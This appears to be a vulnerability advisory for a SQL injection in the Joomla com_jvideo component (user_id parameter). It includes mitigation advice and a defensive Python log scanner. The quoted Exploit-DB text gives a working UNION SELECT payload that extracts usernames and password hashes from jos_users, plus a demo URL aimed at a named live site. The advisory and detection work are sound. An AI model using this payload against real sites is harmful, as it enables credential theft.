Vendor: JVideo! Component
By: Chip D3 Bi0s
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL injection
CWE: 89
Product Name: JVideo! Component
Affected Version From: 0.3.11c Beta
Affected Version To: 0.3.11c Beta
Patch Exists: NO
Related CWE: N/A
CPE: a:infinovision.com:jvideo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Joomla Component com_jvideo (user_id) SQL-injection Vulnerability

A SQL injection vulnerability exists in the Joomla component com_jvideo. The user_id parameter passed to the index.php script is not properly sanitised before being used in a SQL query, so an attacker can manipulate the query by injecting arbitrary SQL code. Successful exploitation may allow execution of arbitrary SQL code in the context of the database user.

Mitigation:

Input validation should be applied to the user_id parameter before it is used in the SQL query, to prevent SQL injection attacks.
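One way to apply that validation and to look for past attempts in web-server logs, as an added example that is not part of the original advisory or of the component's code. The log lines are constructed, and the function names and the 10-digit limit are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [29/May/2009:10:01:02 +0000] "GET /index.php?option=com_jvideo&view=user&user_id=62 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [29/May/2009:10:02:11 +0000] "GET /index.php?option=com_jvideo&view=user&user_id=62+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [29/May/2009:10:02:40 +0000] "GET /index.php?option=com_jvideo&view=user&user_id=62%20AND%201%3D2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [29/May/2009:10:03:00 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [29/May/2009:10:04:00 +0000] "GET /index.php?option=com_jvideo&view=user HTTP/1.1" 200 100 "-" "-"',
]

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')


def valid_user_id(raw):
    """Strict allow-list: 1 to 10 ASCII digits and nothing else.

    The length limit is an assumption; size it to the real id column.
    [0-9] is used instead of \\d so non-ASCII digits are rejected too.
    """
    return re.fullmatch(r'[0-9]{1,10}', raw) is not None


def suspicious_requests(lines):
    """Return (client, user_id values) for com_jvideo requests whose
    user_id is repeated or is not a plain integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs percent-decodes and turns '+' into a space, so encoded
        # variants of the same payload are normalised before the check.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if 'com_jvideo' not in params.get('option', []):
            continue
        values = params.get('user_id', [])
        if values and (len(values) > 1 or not valid_user_id(values[0])):
            hits.append((client, values))
    return hits


if __name__ == '__main__':
    for client, values in suspicious_requests(SAMPLE_LOG):
        print(client, values)
```

The same `valid_user_id` check, applied in the request handler before the query is built, rejects both flagged requests; binding the value as a query parameter rather than concatenating it remains the primary fix.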

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_jvideo (user_id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################
[+] Author        :  Chip D3 Bi0s
[+] Greetz        :  d4n!ux + x_jeshua + eCORE + Painboy + rayok3nt + 3l3cTron1k_0
[+] Vulnerability :  SQL injection
[+] Google Dork   :  imagine ;)
--------------------------------------------------
author       :     Russell...
author Email :     chipdebios[alt+64]gmail.com

###################################################

Example:
http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code]


SQL code:
+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users


DEMO:


http://www.mosessite.com/index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users

etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

<name>JVideo!</name>
<creationDate>September 2008</creationDate>
<author>Infinovision.com</author>
<authorEmail>team@infinovision.com</authorEmail>
<authorUrl>http://www.infinovision.com</authorUrl>
<copyright>Copyright 2008 Infinovision.com</copyright>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<version>0.3.11c Beta</version>
<description>JVideo! Component</description>

# milw0rm.com [2009-05-29]